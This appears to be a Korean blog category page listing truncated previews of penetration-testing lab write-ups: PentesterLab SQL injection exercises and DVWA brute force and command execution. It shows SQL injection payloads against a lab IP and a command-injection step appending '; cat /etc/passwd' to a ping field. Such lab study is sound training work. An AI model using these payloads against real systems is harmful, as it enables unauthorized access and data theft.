본문 바로가기

Security/Test Bed3

PentesterLab 2 SQL Injection Example 1 (MAKE IT TRUE) PoC Example 2 (LIMIT-MAKE IT TRUE) PoC limit 함수반환되는 출력수를 제한하는 함수임 반환 행 수 제한 우회사용자 로그인 시, 쿼리에서 반환되는 사용자가 1명이도록 소스코드에서 제한하는 경우가 있음limit 함수를 사용하면 반환되는 행 수를 제한할 수 있으므로 이를 이용하면 됨 Example 3 (ESCAPE-MAKE IT TRUE) Hint싱글 쿼터를 입력해도 에러 메세지가 반환되지 않음 PoC Normal QuerySELECT * FROM users WHERE username='root' AND password='qwer'; Injection QuerySELECT * FROM users WHERE u.. 2019. 3. 21.
DVWA(Damn Vulnerable Web Application) Brute Force Low, MediumSTEP 1) 로그인 페이지의 Username과 Password 입력란에 임의의 문자열을 넣고 Login버튼을 눌렀더니 username, password 파라미터로 값이 전달되는 것을 확인했습니다. STEP 2) Brute Force 공격을 수행 후, 결과로 Length 길이가 다른 Payload1과 Payload2를 확인하였습니다. STEP 3) 획득한 Payload값을 각각 Username, Password에 입력하여 로그인하였습니다. Command Execution LowSTEP 1) ping이 가능한 입력 란에 ping 대상 IP주소와 여러 개의 명령어를 한 줄에 실행시킬 수 있는 문자인 ‘;’와 cat /etc/passwd 명령어를 적고 submit버튼을.. 2019. 3. 19.
PentesterLab 1 SQL Injection Example 1 (STRING TYPE-MAKE IT TRUE)http://192.168.30.129/sqli/example1.php?name=root PoChttp://192.168.30.129/sqli/example1.php?name=root' or '1'='1http://192.168.30.129/sqli/example1.php?name=root' or 1=1-- -http://192.168.30.129/sqli/example1.php?name=root' or 1=1%23 주석 필터링 우회%23 : # MySQL 주석1. #2. -- (뒤에 공백이 있어야 주석으로 동작함)3. /**/ Example 2 (ERROR NO SPACE-MAKE IT TRUE)http://192.. 2019. 3. 18.